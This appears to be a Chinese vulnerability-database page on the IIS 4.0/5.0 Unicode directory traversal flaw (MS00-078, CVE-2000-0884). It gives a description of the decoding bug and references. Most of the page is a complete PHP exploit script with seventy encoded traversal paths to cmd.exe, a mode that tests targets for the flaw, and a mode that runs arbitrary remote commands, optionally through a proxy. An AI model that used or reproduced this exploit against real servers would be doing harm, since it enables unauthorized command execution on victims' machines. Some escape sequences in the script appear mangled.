Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)
| 漏洞ID | 1106045 | 漏洞类型 | 输入验证 |
| 发布时间 | 2000-10-17 | 更新时间 | 2005-10-12 |
![图片[1]-Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2000-0884 |
![图片[2]-Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200012-156 |
| 漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
IIS是Microsoft出品的一个广泛应用的InternetWeb服务器软件,随WindowsNT和Windows2000捆绑发售。默认情况下IIS的某些目录是允许通过提交HTTP请求执行可执行文件的。NSFOCUS安全小组发现IIS4.0和IIS5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些Web根目录以外的文件和程序。对于IIS5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如”%c1%hh”或者”%c0%hh”,它会首先将其解码变成:0xc10xhh,然后尝试打开这个文件,Windows系统认为0xc10xhh可能是Unicode编码,因此它会首先将其解码,如果0x00<=%hh<0x40的话,采用的解码的格式与下面的格式类似:%c1%hh->(0xc1-0xc0)*0x40+0xhh%c0%hh->(0xc0-0xc0)*0x40+0xhh因此,利用这种编码,我们可以构造很多字符,例如:%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c=’/’%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f=”攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。RainForestPuppy测试发现对于英文版的IIS4.0/5.0,此问题同样存在,只是编码格式略有不同,变成”%c0%af”或者”%c1%9c”。
|漏洞EXP
source: http://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
#!php -q
<?
$vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
$vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[63]="/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
if(!isset($argv[1]))
{
echo
"nn--------------------------------------------------------------------n";
echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron
------n";
echo
"--------------------------------------------------------------------nn";
echo "Usage of the wicked device:n";
echo $argv[0]." -t www.victim.vicn";
echo $argv[0]." -t www.victim.vic -p proxy:portn";
echo $argv[0]." www.victim.vic comand variant_numbern";
echo $argv[0]." -p proxy:port www.victim.vic comand variant_numbern";
echo "Options:n";
echo "-t --> Test the vulnerability (Try known variants till find the good
one)n";
echo "-p --> Attack through proxyn";
echo "nUse Mode:n1) Test the host and get the variants number in case
vulnerability existsn";
echo "2) Attack with command and variants number (optionaly you can use
proxy)n";
echo "Note : When you specify a command with spaces, replace spaces
with low script "_" n";
echo "and you must double the backslash "\". n
Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\inetpub 49n";
echo "Thanks to An-tonio for the proxy support.n";
echo "Bug discover by Anonymous Post.n";
echo "TYPE ".$argv[0]." spanish, for Spanish help.n";
}
else
{
if($argv[1]=="spanish")
{
echo
"nn--------------------------------------------------------------------n";
echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por
BoloTron ----n";
echo
"--------------------------------------------------------------------nn";
echo "Uso del artefacto maligno :n";
echo $argv[0]." -t www.victima.vicn";
echo $argv[0]." -t www.victima.vic -p proxy:puerton";
echo $argv[0]." www.victima.vic comando n�_de_varianten";
echo $argv[0]." -p proxy:port www.victima.vic comand
n�_de_varianten";
echo "Opciones:n";
echo "-t --> Testea la vulnerabilidad, prueba todas las
variantes hasta encontrar una buena.n";
echo "-p --> Ataque a traves de proxyn";
echo "nModo de Empleo:n1) Testear el host y anotar el
numero de variante en caso de ser vulnerablen";
echo "2) Atacar especificando comando y n� de variante
(opcionalmente puedes especificar un proxy)n";
echo "Nota : Cuando se especifica un comando en el que hay
espacios hay que sustituirlos por un guion bajo _ n";
echo "y las contrabarras hay que ponerlas dobles. nEjemplo :
".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\inetpub 49n";
echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.n";
echo "Bug descubierto por aviso anonimo.n";
exit;
}
if($argv[1]=="-t")
{
if ($argv[3]=="-p")
{
for($i=0;$i<70;$i++)
{
$prox=explode(":",$argv[4]);
$comando="dir+c:\";
$fp = fsockopen($prox[0], $prox[1]);
if(!$fp)
{
echo "Conection failed...n";
}
else
{
fputs($fp,"GET
http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0nn");
echo "Trying variant number ".$i." ";
while(!feof($fp))
{
$resul=$resul.fgets($fp,128);
}
if (ereg("<DIR>", $resul))
{
echo "-----> Vulnerable!!n";
exit;
}
else
{
echo "-----> NoT Vulnerable
:(n";
}
}
fclose($fp);
}
}
else
{
for($i=0;$i<70;$i++)
{
$port=80;
$comando="dir+c:\";
$fp = fsockopen($argv[2], $port);
if(!$fp)
{
echo "Conection failed...n";
}
else
{
fputs($fp,"GET
".$vector_ataque[$i]."".$comando." HTTP/1.0nn");
echo "Trying variant number ".$i." ";
while(!feof($fp))
{
$resul=$resul.fgets($fp,128);
}
if (ereg("<DIR>", $resul))
{
echo "-----> vulnerable!!n";
exit;
}
else
{
echo "-----> No Vulnerable :(n";
}
}
fclose($fp);
}
}
}
else
{
if($argv[1]=="-p")
{
$prox=explode(":",$argv[2]);
$port=$prox[1];
$comando=ereg_replace("_","+",$argv[4]);
$fp = fsockopen($prox[0], $port);
if(!$fp)
{
echo "Conection failed.n";
}
else
{
fputs($fp,"GET
http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0nn");
while(!feof($fp))
{
echo fgets($fp,128);
}
}
fclose($fp);
}
else
{
$port=80;
$comando=ereg_replace("_","+",$argv[2]);
$fp = fsockopen($argv[1], $port);
if(!$fp)
{
echo "Conection failed.n";
}
else
{
fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0nn");
while(!feof($fp))
{
echo fgets($fp,128);
}
}
fclose($fp);
}
}
}
?>
|参考资料
来源:MS
名称:MS00-078
链接:http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
来源:XF
名称:iis-unicode-translation
链接:http://xforce.iss.net/static/5377.php
来源:BID
名称:1806
链接:http://www.securityfocus.com/bid/1806
来源:OSVDB
名称:436
链接:http://www.osvdb.org/436
来源:USGovernmentResource:oval:org.mitre.oval:def:44
名称:oval:org.mitre.oval:def:44
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:44
相关推荐: PhotoPost Script Injection Vulnerability
PhotoPost Script Injection Vulnerability 漏洞ID 1096054 漏洞类型 Input Validation Error 发布时间 2005-08-26 更新时间 2005-08-26 CVE编号 N/A CNNVD-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666